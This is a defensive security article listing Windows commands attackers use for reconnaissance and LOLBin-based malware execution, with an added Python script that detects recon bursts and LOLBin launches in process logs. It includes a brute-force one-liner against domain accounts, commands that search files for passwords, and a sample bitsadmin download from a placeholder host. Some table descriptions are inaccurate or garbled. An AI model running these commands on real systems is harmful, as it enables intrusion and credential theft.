The command line interface (CLI) of the Microsoft Windows operating system is a great feature for background jobs such as running scripts and automation tasks. It helps system analysts, network engineers and other technical staff dig into an operating system and troubleshoot it to find the root cause of problems. Most importantly, an intruder can also leverage this CLI to run malicious commands, take over your system to gain full access and control, and exfiltrate data to attacker-controlled servers.
Initial Reconnaissance
Identifying this activity early will save your organization from security breaches; monitoring for specific command patterns and the time intervals between them will give you a lot of information during an investigation. Let's take a look at the initial commands used in this phase.
| Windows Command | Attacker Intention |
|---|---|
| ipconfig | Used to collect network and DNS information. |
| tasklist | Can be used to discover and explore the software currently running on a system by the process names of known products. |
| systeminfo | Provides much information about the OS version, owner name, processor type, BIOS version, system model, time zone, boot time, and more. |
| query | Obtains information such as processes, sessions, and Remote Desktop sessions. |
| qprocess | Obtains process information for Remote Desktop sessions. |
| net start | Start or stop a known or unknown service. |
| whoami | System user information. |
| netstat | List of established connections to existing IPs. |
| net time | Gathers time information. |
| ver | Microsoft Windows version information. |
| net user /domain | Performs the user listing on the domain controller of the computer's primary domain. |
| net localgroup administrators | Displays the local Administrators group on the computer. |
| net localgroup administrators /domain | Displays the local Administrators group on the current domain controller. |
| net group /domain | Displays groups, performing the operation on the domain controller of the current domain. |
| net group "Domain Admins" /domain | Queries the members of Domain Admins in the current domain. |
| net group "Domain Computers" /domain | Queries all domain computers in the current domain. |
| net group "Domain Controllers" /domain | Queries the domain controller computers. |
| net group "Domain Policy Creator Owners" /domain | Queries the domain policy creators. |
| wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber | Local storage device management. |
| net share | Displays information about all of the resources that are shared on the local computer. |
| wmic share | Shared resource management. |
| net accounts /domain | Updates the user accounts database and modifies password and logon requirements for all accounts, performing the operation on the primary domain controller of the current domain. |
| wmic useraccount LIST BRIEF | Prints account information. |
| type C:\Windows\system32\soc_analyst.txt | Shows the contents of a file. |
| dir /a | Displays files with the specified attributes. |
| dir /s | Searches sub-directories. |
| dir /s "*match-text*" | Searches for the word entered in the match-text section in all sub-directories of the current directory. |
| find /I password C:\Windows\System32\*.ini | Searches for a password string in a file or files. |
| tree /F C:\Windows\system32 | Graphically displays the folder structure of a drive or path. |
| fsutil fsinfo drives | Lists the current drives on the system. |
| wmic volume | Local storage volume management. |
| net use \\ip\ipc$ password /user:username | Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. |
| @FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \DomainController\IPC$ /user:%n %p 1>NUL 2>&1 && @echo [*] %n:%p && | Brute-force Windows accounts. |
| FOR /F %f in ('dir /b /s C:') do find /I "password" %f | Searches for "password" in the files under C:. |
| wmic startup | Management of commands that run automatically when users log on to the computer. |
Malware Execution & Spread
After successful reconnaissance, the threat actor may use the built-in functionality of the live system to bring malware onto the premises and execute it. Later the attacker may move inside your network to infect further hosts and exfiltrate confidential data. Let us take a look at the commands used in this phase.
| Windows Command | Attacker's Goal |
|---|---|
| At.exe | Schedule periodic tasks. |
| Atbroker.exe | Atbroker.exe is a process associated with the Windows Assistive Technology Manager utility; it can also run an unknown file. |
| bash.exe | Windows Subsystem for Linux. |
| Bitsadmin.exe | Used to hide unknown files and to move, copy and execute any unknown file. |
| Cmstp.exe | Installs or removes a Connection Manager service profile; silently installs a .INF without creating a desktop icon. |
| Diskshadow.exe | Used to execute a malicious file. |
| Dnscmd.exe | Used to start a malicious DLL in the DNS server. |
| Explorer.exe | Used to execute a malicious file. |
| Extexport.exe | Used to execute a malicious DLL. |
| Forfiles.exe | Used to execute a malicious file. |
| Ftp.exe | Used to execute malicious files. |
| Gpscript.exe | Executes logon scripts configured in Group Policy. |
| Ie4uinit.exe | Executes commands from a specially prepared ie4uinit.inf file. |
| Ieexec.exe | Downloads and executes malicious.exe from a remote server. |
| Infdefaultinstall.exe | Used to execute a malicious INF. |
| Installutil.exe | Used to execute a malicious DLL. |
| Mavinject.exe | Used to execute a malicious DLL. |
| Microsoft.Workflow.Compiler.exe | Compiles and executes C# or VB.NET code in a XOML file referenced in the test.xml file. |
| Mmc.exe | Launches a backgrounded MMC process and invokes a COM payload. |
| Msbuild.exe | Builds and executes a C# project stored in the target XML file. |
| Msconfig.exe | Code execution using Msconfig.exe. |
| Msdt.exe | Executes code while bypassing application whitelisting. |
| Extexport.exe | Executes DLL files. |
| Update.exe | Downloads and executes a file. |
| Tracker.exe | Proxy execution of an arbitrary DLL into another process. |
| SQLToolsPS.exe | Executes a malicious file. |
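As an added example (not code from the original article), the following Python script turns both tables above into detection logic over process-creation telemetry. It flags a burst of distinct reconnaissance commands by one user on one host inside a short time window (the command patterns and time intervals the first section says to monitor) and flags executions of the listed LOLBins together with their parent process. The pipe-delimited log format, host and user names, the five-minute window, the four-command threshold and the set of shell/script-host parents are all assumptions made for this example.

```python
"""Detect the reconnaissance and LOLBin usage listed in the tables above.
Added example, not code from the original article. Input is a constructed,
simplified rendering of the fields a Security event 4688 or Sysmon event 1
record carries:  timestamp|host|user|parent_image|command_line
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands from the reconnaissance table (image name without .exe).
# cmd built-ins such as dir and type never start a separate process, so they
# are only visible inside the command line of the parent cmd.exe.
RECON_COMMANDS = {"ipconfig", "tasklist", "systeminfo", "query", "qprocess",
                  "whoami", "netstat", "ver", "wmic", "fsutil", "tree", "find"}
RECON_NET_SUBCOMMANDS = {"user", "localgroup", "group", "share", "accounts",
                         "time", "start", "use"}

# Binaries from the malware execution table.
LOLBINS = {
    "at.exe", "atbroker.exe", "bash.exe", "bitsadmin.exe", "cmstp.exe",
    "diskshadow.exe", "dnscmd.exe", "extexport.exe", "forfiles.exe", "ftp.exe",
    "gpscript.exe", "ie4uinit.exe", "ieexec.exe", "infdefaultinstall.exe",
    "installutil.exe", "mavinject.exe", "microsoft.workflow.compiler.exe",
    "mmc.exe", "msbuild.exe", "msconfig.exe", "msdt.exe", "update.exe",
    "tracker.exe", "sqltoolsps.exe",
}

# Parents that indicate a shell or script launched the binary (assumption).
SCRIPT_HOST_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def parse_line(line):
    """Split one constructed log line into an event dict."""
    ts, host, user, parent, cmdline = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user,
            "parent": parent.strip().lower(), "cmdline": cmdline.strip()}


def image_name(cmdline):
    """Lower-cased executable name from a command line; handles a quoted
    path containing spaces as well as a bare name such as 'whoami /all'."""
    if cmdline.startswith('"'):
        exe = cmdline[1:].split('"', 1)[0]
    else:
        exe = cmdline.split(None, 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def recon_key(cmdline):
    """Normalise a command line to the discovery command it represents
    ('whoami', 'net group', ...); None if it is not a reconnaissance command."""
    name = image_name(cmdline)
    base = name[:-4] if name.endswith(".exe") else name
    if base == "net":
        parts = cmdline.split()
        if len(parts) > 1 and parts[1].lower() in RECON_NET_SUBCOMMANDS:
            return "net " + parts[1].lower()
        return None
    return base if base in RECON_COMMANDS else None


def recon_bursts(events, window=timedelta(minutes=5), min_distinct=4):
    """Flag (host, user) pairs that ran at least min_distinct different
    discovery commands within one window. Thresholds are assumptions."""
    by_actor = defaultdict(list)
    for ev in events:
        if recon_key(ev["cmdline"]) is not None:
            by_actor[(ev["host"], ev["user"])].append(ev)
    findings = []
    for (host, user), evs in by_actor.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end, ev in enumerate(evs):
            while ev["ts"] - evs[start]["ts"] > window:   # slide the window start
                start += 1
            distinct = {recon_key(e["cmdline"]) for e in evs[start:end + 1]}
            if len(distinct) >= min_distinct:
                # One alert per actor, covering every discovery command inside
                # the window that begins at the first command still in scope.
                tail = [e for e in evs[start:] if e["ts"] - evs[start]["ts"] <= window]
                findings.append({
                    "host": host, "user": user,
                    "first": tail[0]["ts"], "last": tail[-1]["ts"],
                    "commands": sorted({recon_key(e["cmdline"]) for e in tail}),
                })
                break
    return findings


def lolbin_executions(events):
    """Flag every execution of a listed LOLBin and note whether a shell or
    script host launched it, which deserves a higher review priority."""
    return [{
        "host": ev["host"], "user": ev["user"], "ts": ev["ts"],
        "image": image_name(ev["cmdline"]), "parent": ev["parent"],
        "from_script_host": ev["parent"] in SCRIPT_HOST_PARENTS,
    } for ev in events if image_name(ev["cmdline"]) in LOLBINS]


def analyze(log_text):
    events = [parse_line(ln) for ln in log_text.splitlines() if ln.strip()]
    return {"recon_bursts": recon_bursts(events),
            "lolbin_executions": lolbin_executions(events)}


# Constructed sample telemetry: alice's session shows a discovery burst followed
# by bitsadmin launched from cmd.exe; bob runs two discovery commands hours
# apart (no burst); a build service account launches MSBuild from services.exe.
SAMPLE_LOG = """\
2024-03-01T09:00:05|WS01|CORP\\alice|explorer.exe|"C:\\Program Files\\Git\\bin\\git.exe" status
2024-03-01T09:01:10|WS01|CORP\\alice|cmd.exe|ipconfig /all
2024-03-01T09:01:12|WS01|CORP\\alice|cmd.exe|whoami /all
2024-03-01T09:01:15|WS01|CORP\\alice|cmd.exe|net group "Domain Admins" /domain
2024-03-01T09:01:20|WS01|CORP\\alice|cmd.exe|tasklist /v
2024-03-01T09:01:44|WS01|CORP\\alice|cmd.exe|systeminfo
2024-03-01T09:02:30|WS01|CORP\\alice|cmd.exe|C:\\Windows\\System32\\bitsadmin.exe /transfer job1 http://example.invalid/file.bin C:\\Users\\alice\\AppData\\Local\\Temp\\file.bin
2024-03-01T10:30:00|WS02|CORP\\bob|explorer.exe|ipconfig
2024-03-01T14:30:00|WS02|CORP\\bob|explorer.exe|whoami
2024-03-01T11:00:00|SRV01|CORP\\svc_build|services.exe|"C:\\Program Files\\Microsoft Visual Studio\\MSBuild\\Current\\Bin\\MSBuild.exe" build.proj
"""

if __name__ == "__main__":
    for kind, items in analyze(SAMPLE_LOG).items():
        print(kind)
        for item in items:
            print("  ", item)
```

Run against the sample, the script raises one reconnaissance burst for alice on WS01 (five distinct discovery commands in 34 seconds) and two LOLBin findings: bitsadmin.exe from cmd.exe, marked as launched by a script host, and MSBuild.exe from services.exe, which is reported but left for the analyst to judge because build servers legitimately run it. The same structure maps directly onto a SIEM rule: the recon burst is a count-distinct-over-time aggregation keyed on host and user, and the LOLBin check is a lookup on the image name enriched with the parent process.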
Conclusion
Restrict unnecessary commands for normal users using AppLocker rules. Collect the AppLocker events and correlate them in your SIEM (Security Information and Event Management) for earlier detection, and treat detection rules for this kind of activity in your EDR as high-priority alerts, because malicious use of Windows commands can compromise your organization within a few minutes.